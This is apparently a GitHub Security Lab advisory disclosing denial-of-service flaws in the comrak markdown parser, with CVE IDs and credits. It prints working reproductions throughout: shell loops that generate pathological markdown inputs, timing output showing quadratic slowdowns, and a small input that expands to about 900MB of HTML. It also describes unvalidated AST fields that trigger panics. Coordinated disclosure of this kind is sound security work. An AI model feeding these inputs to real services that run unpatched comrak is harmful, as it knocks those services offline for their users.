Coordinated Disclosure Timeline
- 2023-03-22: Issues reported to maintainer and acknowledged
- 2023-03-23: Patches proposed by maintainer
- 2023-03-27: Fixes merged
Summary
A number of quadratic parsing issues can allow an attacker to trigger a denial-of-service via excessive CPU usage or excessive memory usage.
In addition, an architectural design decision in the AST module could allow attackers to trigger a denial-of-service in applications building ASTs programmatically.
Product
Tested Version
Details
Issue 1: Quadratic runtime when parsing markdown (GHSL-2023-047
)
There are a number of parsing issues in comrak
where the runtime increases quadratically compared to the input size. This can allow an attacker to trigger excessive CPU usage and cause a denial of service. comrak
is heavily based on the github/cmark-gfm
project, so a number of quadratic parsing issues are similar to upstream cmark
or cmark-gfm
issues.
In our research we looked at previously submitted bug reports to cmark
or cmark-gfm
, the cmark-gfm
suite of regression tests, and a custom fuzzer we created for comrak
.
Known cmark
or cmark-gfm
vulnerabilities
The cmark
issue, “Pathological input: Deeply nested lists”, can be reproduced in comrak
:
$ for n in $(echo 100 200 400 800 1600); do echo -n "${n}: "; ./a.out "${n}" | time ./target/release/comrak --extension table >/dev/null; done
100: 0.07 real 0.04 user 0.00 sys
200: 0.15 real 0.13 user 0.00 sys
400: 0.63 real 0.60 user 0.01 sys
800: 3.77 real 3.72 user 0.03 sys
1600: 27.64 real 27.32 user 0.14 sys
A number of other cmark
or cmark-gfm
quadratic parsing issues affect comrak
too.
-
Quadratic behavior when parsing emphasis
-
$ for n in 5000 10000 20000 40000 80000; do echo -n "${n} "; python3 -c "print('*t '*$n+'_t*_ '*$n)" |time ./target/release/comrak >/dev/null; done 5000 0.08 real 0.05 user 0.00 sys 10000 0.16 real 0.14 user 0.00 sys 20000 0.51 real 0.48 user 0.01 sys 40000 1.95 real 1.89 user 0.02 sys 80000 8.30 real 8.13 user 0.07 sys
-
-
Quadratic behavior when parsing inlines
-
$ for n in $(echo 5000 10000 20000 40000); do echo -n "${n}: "; python3 -c "print('- '*${n}+'s'+' -'*${n})" | time ./target/release/comrak --smart >/dev/null; done 5000: 0.60 real 0.47 user 0.11 sys 10000: 2.00 real 1.75 user 0.21 sys 20000: 7.54 real 7.01 user 0.43 sys 40000: 31.65 real 30.37 user 0.94 sys
-
-
Quadratic behaviour on pathological html
-
$ for n in $(echo 5000 10000 20000); do echo -n "${n}: "; python3 -c "print('a <\x21[CDATA[' * ${n})" | time ./target/release/comrak >/dev/null; done 5000: 2.24 real 2.17 user 0.01 sys 10000: 8.54 real 8.40 user 0.03 sys 20000: 36.56 real 35.82 user 0.16 sys
-
-
Quadratic behavior when parsing smart quotes
-
$ for n in $(echo 5000 10000 20000 40000 80000 160000); do echo -n "${n}: "; python3 -c "print(\"'\"*$n)" |time ./target/release/comrak --smart >/dev/null; done 5000: 0.06 real 0.04 user 0.00 sys 10000: 0.12 real 0.10 user 0.00 sys 20000: 0.46 real 0.44 user 0.00 sys 40000: 1.85 real 1.82 user 0.00 sys 80000: 7.34 real 7.24 user 0.03 sys 160000: 31.24 real 30.91 user 0.12 sys
-
-
Parsing ‘* * * * * * … a’ takes quadratic time
-
$ for n in $(echo 10000 20000 40000); do echo -n "${n}: "; python3 -c "print('* '*${n} + 'a')" | time ./target/release/comrak >/dev/null; done 10000: 1.26 real 1.02 user 0.21 sys 20000: 4.50 real 3.99 user 0.42 sys 40000: 19.08 real 17.97 user 0.89 sys
-
-
Pathological input: Unclosed inline links (another)
-
$ for n in $(echo 5000 10000 20000 40000); do echo -n "${n}: "; python3 -c "print('[a](<b' * ${n})" | time ./target/release/comrak >/dev/null; done 5000: 0.62 real 0.59 user 0.00 sys 10000: 2.31 real 2.25 user 0.01 sys 20000: 8.95 real 8.81 user 0.04 sys 40000: 35.96 real 35.42 user 0.13 sys
-
-
blocks: Fix quadratic behavior in finalize
-
$ for n in $(echo 5000 10000 20000 40000 80000); do echo -n "${n}: "; python3 -c "print('[a]: u\n' * ${n})" | time ./target/release/comrak >/dev/null; done 5000: 0.14 real 0.12 user 0.00 sys 10000: 0.38 real 0.37 user 0.00 sys 20000: 1.41 real 1.38 user 0.00 sys 40000: 5.52 real 5.46 user 0.01 sys 80000: 24.90 real 24.47 user 0.10 sys
-
cmark-gfm
regression tests
In addition, there are two testcases from the cmark-gfm
testsuite which trigger quadratic parsing behaviour:
- pattern
[ (](
repeated-
$ for n in $(echo 10000 20000 40000); do echo -n "${n}: "; python3 -c "print('[ (](' * ${n})" | time ./target/release/comrak >/dev/null; done 10000: 1.37 real 1.34 user 0.00 sys 20000: 5.13 real 5.10 user 0.01 sys 40000: 21.00 real 20.91 user 0.03 sys
-
- unclosed links A
-
$ for n in $(echo 10000 20000 40000); do echo -n "${n}: "; python3 -c "print('[a](<b' * ${n})" | time ./target/release/comrak >/dev/null; done 10000: 2.27 real 2.21 user 0.01 sys 20000: 8.89 real 8.77 user 0.04 sys 40000: 36.77 real 36.18 user 0.16 sys
-
Fuzz testing
The following testcases show a number of quadratic parsing issues we discovered via fuzzing that appear to be specific to comrak
:
-
"\n|-\n^\" * N
-
$ for n in $(echo 250 500 1000 2000 4000); do echo -n "${n}: "; python3 -c "print(\"\n|-\n^\"*$n)" | time ./target/release/comrak --gfm >/dev/null; done 250: 0.14 real 0.12 user 0.00 sys 500: 0.52 real 0.50 user 0.01 sys 1000: 2.73 real 2.70 user 0.01 sys 2000: 17.05 real 16.99 user 0.04 sys 4000: 125.65 real 125.11 user 0.22 sys
-
-
" |A\n---: |\n| A | A" * N
-
$ for n in $(echo 250 500 1000 2000 4000); do echo -n "${n}: "; python3 -c "print(\" |A\n---: |\n| A | A\"*$n)" | time ./target/release/comrak --gfm >/dev/null; done 250: 0.21 real 0.19 user 0.00 sys 500: 0.96 real 0.93 user 0.01 sys 1000: 5.78 real 5.72 user 0.03 sys 2000: 40.92 real 40.63 user 0.16 sys 4000: ^Ctime: command terminated abnormally 210.26 real 208.68 user 0.74 sys
-
-
"<b" * N
-
$ for n in $(echo 2500 5000 10000 20000 40000 80000 160000); do echo -n "${n}: "; python3 -c "print(\"<b\"*$n)" | time ./target/release/comrak --gfm >/dev/null; done 2500: 0.13 real 0.07 user 0.04 sys 5000: 0.28 real 0.18 user 0.08 sys 10000: 0.80 real 0.61 user 0.17 sys 20000: 2.66 real 2.30 user 0.33 sys 40000: 9.97 real 9.20 user 0.72 sys 80000: 38.00 real 36.28 user 1.55 sys 160000: 147.16 real 143.76 user 2.95 sys
-
-
"[](" * N
-
$ for n in $(echo 2500 5000 10000 20000 40000 80000 160000); do echo -n "${n}: "; python3 -c "print(\"[](\"*$n)" | time ./target/release/comrak --gfm >/dev/null; done 2500: 0.14 real 0.06 user 0.06 sys 5000: 0.26 real 0.12 user 0.12 sys 10000: 0.65 real 0.36 user 0.26 sys 20000: 1.78 real 1.24 user 0.50 sys 40000: 5.88 real 4.78 user 1.01 sys 80000: 21.10 real 18.69 user 2.14 sys 160000: 80.39 real 74.52 user 4.94 sys
-
-
"r@o.c" * N
-
$ for n in $(echo 2500 5000 10000 20000 40000 80000 160000); do echo -n "${n}: "; python3 -c "print(\"r@o.c\"*$n)" | time ./target/release/comrak --gfm >/dev/null; done 2500: 0.21 real 0.07 user 0.12 sys 5000: 0.36 real 0.13 user 0.21 sys 10000: 0.81 real 0.34 user 0.44 sys 20000: 2.03 real 1.16 user 0.83 sys 40000: 5.94 real 4.16 user 1.66 sys 80000: 19.59 real 15.93 user 3.43 sys 160000: 73.22 real 65.63 user 7.08 sys
-
Issue 2: Excessive output when parsing markdown (GHSL-2023-048
)
comrak
is vulnerable to the upstream cmark
issue, “Issue revealed by fuzzer”. A large number of references in a markdown document can trigger an overly large response. For example, this markdown ~40KB document generates a ~900MB HTML output:
$ python3 -c 'print("[1] "*5000,"\n\n[1]: urn:","\x00"*20000,"\n", sep="")' | wc -c
40013
$ python3 -c 'print("[1] "*5000,"\n\n[1]: urn:","\x00"*20000,"\n", sep="")' | ./target/release/comrak |wc -c
900105007
This issue could trigger a denial-of-service be triggering excessive memory usage or generating an overly large output.
Issue 3: Attacker controlled data in AST nodes is not validated (GHSL-2023-049
)
A comrak
AST can be constructed manually by a program instead of parsing a markdown document with parse_document
. This AST can then be converted to HTML via html::format_document_with_plugins
. However, the HTML formatting code assumes that the AST is well-formed. For example, many AST notes contain [u8]
fields which the formatting code assumes is valid UTF-8 data. Several bugs can be triggered if this is not the case. For example:
- The
literal
member ofNodeHtmlBlock
is not validated when formatting an AST to HTML. Theliteral
value is processed by thetagfilter
function which uses the unsafeString::from_utf8_unchecked
). If the value is attacker controlled then it can cause an out of bounds read (up to two bytes ifliteral
ends with 0xe2). - The
literal
member ofNodeHtmlBlock
is not validated when formatting an AST to HTML. Theliteral
value is processed by thetagfilter
function which assumes that it contains well-formed HTML. Ifliteral
contains a truncated HTML tag (e.g.<title
) then a panic can be triggered which crashes the program when indexingliteral[j]
. - The
FootnoteReference
structure is not validated when formatting an AST to HTML. The byte buffer is assumed to be UTF-8 encoded informat_node
. Theunwrap()
call will panic if this is not the case. - The info member of
NodeCodeBlock
is not validated when formatting an AST to HTML. The byte buffer is assumed to be UTF-8 encoded informat_node
. Theunwrap()
call will panic if this is not the case.
Depending on how the comrak
library is used by applications, this could allow attackers to trigger an assertion failure causing a denial-of-service if input is not correctly sanitized.
CVE
- CVE-2023-28626 - GHSL-2023-047
- CVE-2023-28631 - GHSL-2023-049
Credit
GHSL-2023-047 and GHSL-2023-048 were discovered and reported by GHSL team member @philipturnbull (Phil Turnbull).
GHSL-2023-049 was discovered and reported by GHSL team member @darakian (Jonathan Moroney).
Contact
You can contact the GHSL team at securitylab@github.com
, please include a reference to GHSL-2023-047
, GHSL-2023-048
, or GHSL-2023-049
in any communication regarding these issues.